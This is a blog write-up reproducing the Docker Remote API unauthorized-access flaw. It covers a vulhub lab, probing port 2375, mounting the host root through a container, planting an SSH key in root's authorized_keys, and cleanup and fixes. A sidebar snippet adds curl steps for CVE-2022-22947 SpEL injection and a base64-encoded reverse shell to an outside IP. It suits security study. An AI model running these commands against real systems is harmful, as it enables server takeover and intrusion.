Docker API未授权漏洞复现

最新推荐文章于 2025-08-30 23:29:54 发布
原创 最新推荐文章于 2025-08-30 23:29:54 发布 · 4.6k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#docker #安全 #乌鸦安全 #未授权

微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

01 漏洞成因

如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker未授权来控制服务器

02 漏洞搭建

在这里使用vulhub直接进行复现

docker-compose build

docker-compose up -d

漏洞搭建完成

03  漏洞检测

可以使用命令行验证当前的漏洞是否存在

docker  -H tcp://*.*.*.*:2375 images

或者

来证明存在漏洞

http://127.0.0.1:2375/version

http://127.0.0.1:2375/info

04  漏洞利用

因为主机是mac,然后在里面启用了一个docker,然后再里面又启用了一个docker,所以这里是无法使用替换密钥的方法来登陆第二层docker的

所以在这里直接使用脚本利用计划任务来反弹shell

这里尝试一个反弹shell的操作:

其中10.211.55.23是Kali的ip地址

10.211.55.2是docekr的未授权端口这里将shell弹到kali上

当这个脚本在mac上执行完成之后,大概需要很长的时间会返回一个shell回来

05  实战

这里来模拟测试开启Docker API未授权之后,使用密钥登陆受害者机器

5.1 配置Docker支持远程访问

在这里使用我自己的阿里云主机进行测试

首先要配置docker支持远程访问

进行文件备份

cp /lib/systemd/system/docker.service /lib/systemd/system/docker.service.bak

然后编辑

vim /lib/systemd/system/docker.service

在文件的末尾增加以下代码

[Service]ExecStart=ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

保存并退出编辑后,重载守护进程以及重启Docker:

sudo systemctl daemon-reload
sudo service docker restart
通过执行命令查看是否开放了远程访问端口:

systemctl status docker.service

在这里还可以输入docker info 查看

5.2 写入密钥

以下我将vps地址用127.0.0.1进行了替换

在本地执行命令:

查看远程vps的镜像

docker -H tcp://127.0.0.1:2375 images

这时候发现并没有运行的容器,那么来测试下

查看远程vps是否运行了容器

docker -H tcp://127.0.0.1:2375 ps

在这里拉取一个镜像文件busybox

因为这个镜像很小,但是命令很全

docker -H tcp://127.0.0.1:2375 pull busybox

然后运行该镜像

docker -H tcp://127.0.0.1:2375 run -it -v /:/mnt 69593048aa3a /bin/bash

69593048aa3aImage ID

这条命令的意思是启动一个image ID 为69593048aa3a的容器,并且将该宿主机的根目录挂在到容器的/mnt目录下

启动之后就会获得该容器宿主机的shell

然后直接cd mnt/root/

看到了我的服务器上的root下的文件

cd .ssh

在这里要将服务器里面的authorized_keys文件进行备份,一定要记住!!!

在本地生成一个公私钥,这里以Mac环境为例

在桌面新建了一个ssh的文件夹,将生成的公钥保存在里面

注意在生成的密钥要保存的位置我这里是自定义的,如果不是自定义的话,可以一路回车,自定义的话,第一个要写文件路径,后面的也可以一路回车,然后在.ssh路径下获取文件(非自定义路径保存)

生成:ssh-keygen -t rsa

看下生成的文件,有两个

id_rsa      id_rsa.pub

再回到远程主机上来

使用echo指令将公钥写进去

直接远程连接

ssh -i id_rsa root@127.0.0.

登陆成功。

5.3 修复Docker API未授权

将我们的authorized_keys文件删除,将原来的文件复位​​​​​​​

rm authorized_keysmv authorized_keys.bak authorized_keys

然后再去处理配置文件

  rm  /lib/systemd/system/docker.service  # 将备份文件重命名 mv /lib/systemd/system/docker.service.bak   /lib/systemd/system/docker.service
# 重载重启操作systemctl daemon-reloadservice docker restart

然后再用docker info看下

警告信息没了

再试试连接下

可以了

06  修复方法

  1. 设置ACL,只允许信任的IP端口连接对应端口

  2. 开启TLS,使用生成的证书进行认证

微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

web渗透测试漏洞复现docker API未授权漏洞复现并getshell
HACKONE的博客
03-28 792
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
Docker未授权漏洞复现(合天网安实验室)
weixin_51151498的博客
11-29 1519
Docker未授权漏洞复现(合天网安实验室)
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 5758
Docker未授权访问漏洞docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 3133
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker Desktop Engine API 未授权访问漏洞复现[CVE-2025-9074]
最新发布
qq_38733240的博客
08-30 1261
摘要:Docker Desktop存在未授权访问漏洞(CVE-2025-9074),影响v4.25至v4.44.3版本。本地Linux容器可通过默认子网192.168.65.7:2375未授权访问Docker Engine API,执行特权操作(控制容器、管理镜像等),在Windows WSL环境下还可挂载主机目录。漏洞API缺乏严格隔离和权限控制所致。修复方案为升级至v4.44.3以上版本。验证方法包括通过curl检测API开放状态及容器挂载测试。
Docker API 未授权访问漏洞
qq_42383069的博客
05-09 8348
Docker API 未授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
手把手教你搭建 Docker API 未授权漏洞环境
nhb687096的博客
07-07 1279
环境:ubuntu 16.04我是在虚拟机中安装了ubuntu 16.04的环境,里面暂时没有docker、ssh远程、vim等。
未授权访问:Docker未授权访问漏洞
qq_68163788的博客
05-14 3659
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
DOCKER REMeOTE API 未授权访问漏洞复现
weixin_43061533的博客
12-01 879
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
docker remote API 漏洞复现
顶峰
04-03 479
引用网上的一些总结流程1. Docker是以root权限运行的,这是所有姿势的前提1.Docker在运行一个容器的时候可以将宿主机上的一个目录挂载到容器内的一个目录,我们可以参考redis未授权访问漏洞,将宿主机的/root/.ssh目录挂载到容器上,然后写入公钥。如果有web目录的话,最差也能上一个webshell。1.
【云安全】云原生-Docker(六)Docker API 未授权访问
仇辉攻防的博客
02-19 1311
Docker APIDocker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,用户可以通过 HTTP 请求来执行诸如创建、启动、停止、删除容器等操作。同时,Docker API 还允许用户管理镜像、网络、卷等 Docker 资源。用户可以使用任何支持 HTTP 请求的工具或库来访问 Docker API,从而实现与 Docker 容器平台的集成和自动化管理。
Docker Remote API 未授权访问漏洞
weixin_53736204的博客
08-04 804
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
Docker API 未授权访问漏洞复现
LuckySec
08-31 5760
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作DockerDocker API 未授权访问漏洞分析和利用 0x02 环境准备 靶机环境:192.168.126.130 (ubuntu) 攻击环境:192.168.126.128 (kali) 在靶机上使用vulhub复现漏洞环境。 vulhub官网地址:https://vulhub.
漏洞——Docker远程api未授权访问(原理扫描)
龍承leo
10-24 1063
Docker远程api未授权访问(原理扫描)
Docker未授权访问漏洞详解
m0_64481831的博客
06-11 2555
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
DockerAPI未授权访问
Dikesi的博客
02-08 841
Docker API 未授权访问
docker api未授权导致rce 漏洞修复
core815的专栏
05-26 2453
docker api未授权导致rce 漏洞修复
Docker|漏洞Docker api未授权导致rce
wei的博客
05-28 2287
解决docker api未授权导致rce漏洞修复
Docker Remote Api未授权访问漏洞
Seth为理想奋斗
06-17 3279
一. 漏洞原因 dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 3, 没有使用iptables等限制可连接的来源ip二. 漏洞利用1.远程对被攻击的主机的docker容器进行操作docker -H tcp://remoteip:2375 images 远程启动被攻击主机的docker
利用docker对cve-2022-22947漏洞复现
06-27
<think>我们正在处理一个关于使用Docker复现CVE-2022-22947漏洞的请求。根据提供的引用信息,我们知道这是一个SpringCloudGatewayActuatorAPI的SpEL代码注入漏洞。用户希望得到详细的复现步骤。复现环境准备:1.确保系统已安装DockerDockerCompose。2.下载vulhub漏洞测试环境(包含CVE-2022-22947的环境)。复现步骤:步骤1:下载vulhub步骤2:进入对应的漏洞目录步骤3:启动漏洞环境步骤4:访问目标服务,确认环境启动成功步骤5:利用漏洞执行命令(例如:反弹shell或执行计算器)需要注意的是,复现漏洞应在授权环境下进行,且仅用于学习目的。我们将按照上述思路给出详细步骤。</think>### 使用 Docker 复现 CVE-2022-22947 漏洞的步骤 CVE-2022-22947 是 Spring Cloud Gateway 的 Actuator API 存在的 SpEL 表达式注入漏洞,攻击者可远程执行任意代码。以下是基于 Docker复现流程: --- #### **1. 环境准备** - **系统要求**:已安装 DockerDocker Compose - **下载漏洞环境**: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/spring/CVE-2022-22947 ``` --- #### **2. 启动漏洞环境** ```bash docker-compose up -d # 后台启动容器 ``` - 容器启动后,访问 `http://localhost:8080` 确认 Gateway 服务正常运行(显示 Whitelabel Error Page 即正常)[^1]。 --- #### **3. 漏洞利用(执行任意命令)** ##### **步骤 1:添加恶意路由** 发送 POST 请求创建包含恶意 SpEL 表达式的路由: ```bash curl -X POST http://localhost:8080/actuator/gateway/routes/hack \ -H "Content-Type: application/json" \ -d '{ "predicates": [{ "name": "Path", "args": {"_genkey_0":"/hack"} }], "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"whoami\").getInputStream()))}" } }], "uri": "http://example.com" }' ``` > **关键参数**: > - `value` 字段:注入 SpEL 表达式,此处执行 `whoami` 命令。 > - 替换 `exec(\"whoami\")` 可执行任意命令(如 `exec(\"touch /tmp/poc\")`)。 ##### **步骤 2:刷新路由使配置生效** ```bash curl -X POST http://localhost:8080/actuator/gateway/refresh ``` ##### **步骤 3:触发恶意路由** 访问路由路径触发命令执行: ```bash curl http://localhost:8080/hack ``` - **结果验证**:响应头中的 `Result` 字段将显示命令执行结果(如当前用户名为 `root`)。 --- #### **4. 反弹 Shell 示例** 将步骤 1 的 `value` 字段替换为反弹 Shell 命令: ```json "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}\").getInputStream()))}" ``` > 需将 `YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEwLzQ0NDQgMD4mMQ==` 替换为编码后的反弹 Shell 命令(使用 `base64` 编码)。 --- #### **5. 清理环境** ```bash docker-compose down # 停止并删除容器 ``` --- ### **漏洞原理** - **漏洞点**:`/actuator/gateway/routes` 端点未过滤用户输入,直接解析 SpEL 表达式。 - **利用条件**:需启用 Actuator API 且暴露 `gateway` 端点(默认不暴露)[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值